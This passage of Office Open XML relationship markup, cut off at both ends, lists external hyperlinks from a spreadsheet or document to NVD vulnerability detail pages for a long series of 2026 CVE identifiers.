Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45273" TargetMode="External" Id="rId1119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45809" TargetMode="External" Id="rId1120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46334" TargetMode="External" Id="rId1121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46382" TargetMode="External" Id="rId1122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46384" TargetMode="External" Id="rId1123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46385" TargetMode="External" Id="rId1124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46636" TargetMode="External" Id="rId1125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47659" TargetMode="External" Id="rId1126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47660" TargetMode="External" Id="rId1127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47661" TargetMode="External" Id="rId1128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47662" TargetMode="External" Id="rId1129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47663" TargetMode="External" Id="rId1130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47665" TargetMode="External" Id="rId1131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47683" TargetMode="External" Id="rId1132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47879" TargetMode="External" Id="rId1133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48006" TargetMode="External" Id="rId1134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48026" TargetMode="External" Id="rId1135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48059" TargetMode="External" Id="rId1136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48813" TargetMode="External" Id="rId1137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49478" TargetMode="External" Id="rId1138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52736" TargetMode="External" Id="rId1139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53453" TargetMode="External" Id="rId1140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53502" TargetMode="External" Id="rId1141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53530" TargetMode="External" Id="rId1142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53758" TargetMode="External" Id="rId1143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53924" TargetMode="External" Id="rId1144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54347" TargetMode="External" Id="rId1145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54722" TargetMode="External" Id="rId1146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54729" TargetMode="External" Id="rId1147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55100" TargetMode="External" Id="rId1148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55191" TargetMode="External" Id="rId1149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55193" TargetMode="External" Id="rId1150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55194" TargetMode="External" Id="rId1151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55245" TargetMode="External" Id="rId1152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55250" TargetMode="External" Id="rId1153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55763" TargetMode="External" Id="rId1154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55764" TargetMode="External" Id="rId1155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55768" TargetMode="External" Id="rId1156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56718" TargetMode="External" Id="rId1157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57445" TargetMode="External" Id="rId1158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59643" TargetMode="External" Id="rId1159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61556" TargetMode="External" Id="rId1160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62243" TargetMode="External" Id="rId1161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62292" TargetMode="External" Id="rId1162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62648" TargetMode="External" Id="rId1163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62649" TargetMode="External" Id="rId1164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62650" TargetMode="External" Id="rId1165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62865" TargetMode="External" Id="rId1166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63188" TargetMode="External" Id="rId1167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63383" TargetMode="External" Id="rId1168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63384" TargetMode="External" Id="rId1169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63403" TargetMode="External" Id="rId1170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64836" TargetMode="External" Id="rId1171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64837" TargetMode="External" Id="rId1172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64838" TargetMode="External" Id="rId1173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64850" TargetMode="External" Id="rId1174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64852" TargetMode="External" Id="rId1175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66360" TargetMode="External" Id="rId1176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66840" TargetMode="External" Id="rId1177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67195" TargetMode="External" Id="rId1178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67198" TargetMode="External" Id="rId1179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67200" TargetMode="External" Id="rId1180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67281" TargetMode="External" Id="rId1181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67299" TargetMode="External" Id="rId1182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67301" TargetMode="External" Id="rId1183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67304" TargetMode="External" Id="rId1184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67327" TargetMode="External" Id="rId1185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67331" TargetMode="External" Id="rId1186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67581" TargetMode="External" Id="rId1187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68494" TargetMode="External" Id="rId1188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68899" TargetMode="External" Id="rId1189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69091" TargetMode="External" Id="rId1190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69095" TargetMode="External" Id="rId1191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69096" TargetMode="External" Id="rId1192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69220" TargetMode="External" Id="rId1193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6924" TargetMode="External" Id="rId1194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69249" TargetMode="External" Id="rId1195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69263" TargetMode="External" Id="rId1196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70453" TargetMode="External" Id="rId1197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70464" TargetMode="External" Id="rId1198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70492" TargetMode="External" Id="rId1199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70619" TargetMode="External" Id="rId1200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71190" TargetMode="External" Id="rId1201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71404" TargetMode="External" Id="rId1202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71491" TargetMode="External" Id="rId1203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71961" TargetMode="External" Id="rId1204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71965" TargetMode="External" Id="rId1205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71966" TargetMode="External" Id="rId1206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71981" TargetMode="External" Id="rId1207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72730" TargetMode="External" Id="rId1208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72767" TargetMode="External" Id="rId1209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72779" TargetMode="External" Id="rId1210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72781" TargetMode="External" Id="rId1211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72819" TargetMode="External" Id="rId1212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72826" TargetMode="External" Id="rId1213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72827" TargetMode="External" Id="rId1214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72837" TargetMode="External" Id="rId1215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72840" TargetMode="External" Id="rId1216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72870" TargetMode="External" Id="rId1217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72874" TargetMode="External" Id="rId1218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72884" TargetMode="External" Id="rId1219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73062" TargetMode="External" Id="rId1220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73081" TargetMode="External" Id="rId1221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73314" TargetMode="External" Id="rId1222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73316" TargetMode="External" Id="rId1223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73413" TargetMode="External" Id="rId1224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73614" TargetMode="External" Id="rId1225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73615" TargetMode="External" Id="rId1226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73693" TargetMode="External" Id="rId1227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74787" TargetMode="External" Id="rId1228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74792" TargetMode="External" Id="rId1229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75124" TargetMode="External" Id="rId1230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75133" TargetMode="External" Id="rId1231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75584" TargetMode="External" Id="rId1232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75596" TargetMode="External" Id="rId1233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75813" TargetMode="External" Id="rId1234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75836" TargetMode="External" Id="rId1235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75840" TargetMode="External" Id="rId1236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75853" TargetMode="External" Id="rId1237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75859" TargetMode="External" Id="rId1238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75914" TargetMode="External" Id="rId1239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75915" TargetMode="External" Id="rId1240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75960" TargetMode="External" Id="rId1241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76224" TargetMode="External" Id="rId1242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76639" TargetMode="External" Id="rId1243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77101" TargetMode="External" Id="rId1244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77102" TargetMode="External" Id="rId1245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77103" TargetMode="External" Id="rId1246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77105" TargetMode="External" Id="rId1247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77111" TargetMode="External" Id="rId1248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77120" TargetMode="External" Id="rId1249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77298" TargetMode="External" Id="rId1250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77354" TargetMode="External" Id="rId1251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77357" TargetMode="External" Id="rId1252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77393" TargetMode="External" Id="rId1253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79707" TargetMode="External" Id="rId1254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79756" TargetMode="External" Id="rId1255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79987" TargetMode="External" Id="rId1256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79989" TargetMode="External" Id="rId1257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81640" TargetMode="External" Id="rId1258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82064" TargetMode="External" Id="rId1259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82075" TargetMode="External" Id="rId1260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82538" TargetMode="External" Id="rId1261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82639" TargetMode="External" Id="rId1262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82882" TargetMode="External" Id="rId1263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83605" TargetMode="External" Id="rId1264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83606" TargetMode="External" Id="rId1265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83607" TargetMode="External" Id="rId1266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83608" TargetMode="External" Id="rId1267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83609" TargetMode="External" Id="rId1268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83612" TargetMode="External" Id="rId1269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83613" TargetMode="External" Id="rId1270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83614" TargetMode="External" Id="rId1271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83615" TargetMode="External" Id="rId1272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83616" TargetMode="External" Id="rId1273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83617" TargetMode="External" Id="rId1274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83618" TargetMode="External" Id="rId1275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83619" TargetMode="External" Id="rId1276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84190" TargetMode="External" Id="rId1277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84202" TargetMode="External" Id="rId1278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84208" TargetMode="External" Id="rId1279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84304" TargetMode="External" Id="rId1280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84476" TargetMode="External" Id="rId1281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84482" TargetMode="External" Id="rId1282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84694" TargetMode="External" Id="rId1283" /><Relationship 